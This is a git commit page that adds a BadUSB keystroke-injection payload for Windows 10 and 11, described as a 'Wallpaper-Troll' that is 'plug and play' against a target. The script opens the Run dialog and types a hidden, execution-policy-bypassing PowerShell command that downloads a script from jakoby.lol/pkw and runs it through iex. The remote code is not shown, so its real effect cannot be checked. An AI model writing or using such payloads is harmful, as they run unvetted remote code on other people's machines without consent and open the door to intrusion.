Create Wallpaper-URL.txt
This commit is contained in:
parent
e05ae050f3
commit
cbdd2f62fb
1 changed files with 16 additions and 0 deletions
16
Payloads/Flip-WallPaper-URL/Wallpaper-URL.txt
Normal file
16
Payloads/Flip-WallPaper-URL/Wallpaper-URL.txt
Normal file
|
@ -0,0 +1,16 @@
|
|||
REM Title: Wallpaper-Troll
|
||||
REM
|
||||
REM Author: I am Jakoby
|
||||
REM
|
||||
REM Description: This payload will change your targets wallpaper to an image from a provided url
|
||||
REM Target: Windows 10, 11
|
||||
REM
|
||||
REM --------------------------------------------------------------------------------------
|
||||
REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
|
||||
REM --------------------------------------------------------------------------------------
|
||||
REM
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -noexit -NoP -NonI -Exec Bypass $url='URL-HERE';irm jakoby.lol/pkw | iex
|
||||
DELAY 500
|
||||
ENTER
|
Loading…
Reference in a new issue